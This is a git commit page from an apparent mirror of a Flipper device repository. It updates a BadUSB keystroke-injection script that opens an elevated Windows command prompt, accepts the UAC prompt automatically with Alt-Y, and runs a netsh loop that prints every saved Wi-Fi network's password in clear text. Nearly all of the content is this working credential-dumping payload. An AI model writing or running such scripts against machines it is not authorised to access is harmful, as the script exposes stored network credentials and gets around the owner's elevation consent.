mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-04-25 11:47:19 +00:00
Update Show_WiFi_Passwords.txt
This commit is contained in:
parent
40871373f2
commit
64279a99bc
@ -2,7 +2,10 @@ DELAY 3000
|
|||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING cmd
|
STRING cmd
|
||||||
ENTER
|
DELAY 500
|
||||||
DELAY 2000
|
CTRL-SHIFT ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT Y
|
||||||
|
DELAY 1000
|
||||||
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user